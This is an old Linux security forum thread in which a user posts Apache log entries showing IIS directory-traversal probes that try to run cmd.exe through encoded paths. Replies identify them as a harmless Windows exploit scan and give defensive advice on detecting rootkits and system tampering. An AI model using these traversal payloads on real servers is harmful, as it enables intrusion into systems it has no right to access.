LinuxQuestions.org
Review your favorite Linux distribution.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 01-11-2004, 02:16 PM   #1
Hovi
LQ Newbie
 
Registered: Jan 2004
Location: n.Y.c
Distribution: Suse 9.0
Posts: 8

Rep: Reputation: 0
Should i worry?


i saw this in my access log:
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 962 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 962 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"

Should i worry and what is this person trying to do??
thnx in advance
 
Old 01-11-2004, 04:00 PM   #2
chort
Senior Member
 
Registered: Jul 2003
Location: Silicon Valley, USA
Distribution: OpenBSD 4.6, OS X 10.6.2, CentOS 4 & 5
Posts: 3,660

Rep: Reputation: 75
No, it's just a mindless IIS exploit. It does not affect non-Windows boxen.
 
Old 01-11-2004, 06:34 PM   #3
Hovi
LQ Newbie
 
Registered: Jan 2004
Location: n.Y.c
Distribution: Suse 9.0
Posts: 8

Original Poster
Rep: Reputation: 0
thnx
By the way how would i know if i got hacked?
 
Old 01-11-2004, 06:43 PM   #4
chort
Senior Member
 
Registered: Jul 2003
Location: Silicon Valley, USA
Distribution: OpenBSD 4.6, OS X 10.6.2, CentOS 4 & 5
Posts: 3,660

Rep: Reputation: 75
If you see a message like this on your console:
w3 0wnZ j00!
 
Old 01-11-2004, 09:26 PM   #5
Hovi
LQ Newbie
 
Registered: Jan 2004
Location: n.Y.c
Distribution: Suse 9.0
Posts: 8

Original Poster
Rep: Reputation: 0
lol haha thnx for the pointers.~_^
 
Old 01-11-2004, 11:39 PM   #6
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Just as a general rule of thumb, anytime you see entries in your Apache log that have a .exe as part of the URL (usually as cmd.exe), you can feel pretty confident that what you're looking at is a Windows exploit attempt. The /winnt/system32/ path is a dead give away as well.
 
Old 01-12-2004, 10:16 AM   #7
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3594Reputation: 3594Reputation: 3594Reputation: 3594Reputation: 3594Reputation: 3594Reputation: 3594Reputation: 3594Reputation: 3594Reputation: 3594Reputation: 3594
By the way how would i know if i got hacked?
To determine chances of getting your box being subverted depends for instance on:
1. what (publicly accessable) services you run and how they are secured (and access to them),
2. what (way) users are allowed (limit(ed|less)) access to the system,
3. what access rights users have to system commands and resources.
The generic best way to remove possibilities for system compromise is to work and think along the lines of the ancient security mantra: "that which is not explicitly allowed is forbidden". For details on securing and hardening, please see the LQ FAQ: Security references.


To know what the "best" ways to check for system compromise are and how to prevent them or determine status, you should know a system can be controlled by a cracker. The worst case scenario will reroute system calls to for instance filter out and hide processes. This can be done for instance by loading a Linux Kernel Module (LKM, see for instance the Adore-ng LKM), changing the running kernel's memory (see for instance the Suck-IT rootkit or Google for Silvio Cesare's docs) or preloading a library (ld.so rootkit).
The generic best way to address these issues is to:
1. take away capabilities to load modules and change memory structures (in the case of LKM's: kernel recompile or lcap, rest: kernel patch: 2.2.x: Open Wall, 2.4.x: Grsecurity, LIDS, 2.6.x Grsecurity or LSM?), and
2. deny users access to resources (files, devices, processes) they do not explicitly need, and
3. make system binaries, config files, authentication databases immutable (or partition mounted readonly when not using ext2/ext3fs) and make access logs append-only.


The generic best way to detect system tampering is to:
1. install and regularly run a filesystem integrity scanner (Aide, Samhain, tripwire) right after you installed the OS, and before it was connected to a network. Save a copy of the binary, databases (,system configs and package manager databases) on readonly media (or secured signature server) for later use. If unsure, reboot the box loading a kernel from a trusted source like your distributions bootable cdrom, Knoppix, Trinux, tomsrtbt before checking.
This solution beats running Chkrootkit or Rootkit Hunter, because the result should show *any* changed file on the system and not just in the statically coded locations like those two apps use.
2. verbose and make use of system logging, process the logs and regularly check the reports.
The essence is that whatever exploiting takes place most likely will be noisy, and so logging about everything gives you a better view on what's happening. Verbose logging should not be seen as a nuisance: you can't detect problems if you don't log 'em. Run a logwatcher/analyser to regularly supply you with logs. Please check out Grsecurity, logging options else maybe try the procmon LKM.
Here's an example of Grsecurity doing exec logging (in a chroot, syslog date cut away):
Code:
exec of /chroot/hammettk/bin/ls within chroot by process (bash:22741) UID(1001) EUID(1001), parent (bash:8391) UID(1001) EUID(1001)
exec of /chroot/hammettk/usr/bin/du within chroot by process (bash:23616) UID(1001) EUID(1001), parent (bash:13778) UID(1001) EUID(1001)
exec of /chroot/hammettk/usr/bin/df within chroot by process (bash:16468) UID(1001) EUID(1001), parent (bash:13778) UID(1001) EUID(1001)
Here's an example of Procmon doing exec logging (date cut away):
Code:
1001:22741:/bin/ls --color
1001:23616:/usr/bin/du
1001:16468:/usr/bin/df -h
3. In the case you suspect a LKM to be loaded you have two options:
- passive: check your ksyms log if your have recent modutils package (both examples: adore):
Code:
 __insmod_adore_O/var/tmp/ka/adore.o_M3FDDF647_V132117 [adore]
 __insmod_adore_S.text_L4944 [adore]
Note logging can easily be avoided if the cracker supplies her own insmod binary, kills, reroutes or denies logging or scrubs the logs.
- active: you could try running kern_check. If the result shows something like:
Code:
WARNING: (kernel) 0xe1b9d220 != 0xc01dc990 (map)  [sys_open]
WARNING: (kernel) 0xe1b9d1a8 != 0xc01dbf40 (map)  [sys_chdir]
WARNING: (kernel) 0xe1b9d094 != 0xc01ed590 (map)  [sys_getdents]
WARNING: (kernel) 0xe1b9d2a4 != 0xc01c38f0 (map)  [sys_getgid]
it's time to investigate. Note: not with kernels that deny reading /dev/kmem.
4. Run Chkrootkit.


This is not all, but at least you've got an basic idea I hope...
 
Old 01-12-2004, 03:16 PM   #8
Hovi
LQ Newbie
 
Registered: Jan 2004
Location: n.Y.c
Distribution: Suse 9.0
Posts: 8

Original Poster
Rep: Reputation: 0
Well thnx for the responses..Really helps.New to this security thing
thnx for the help guys.~_^
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Security Worry little_penguin Linux - Security 6 08-23-2005 10:06 PM
Do I really need to worry about security? mooreted Linux - Security 19 07-05-2004 02:02 PM
should i worry about these outputs? wza Linux - General 3 01-10-2004 12:18 AM
Beyond BLFS +My worry alex_smith Linux From Scratch 2 06-26-2003 01:34 AM
TAR errors - to worry or not to worry?? dudeha Linux - General 2 12-31-2002 03:09 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 03:23 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration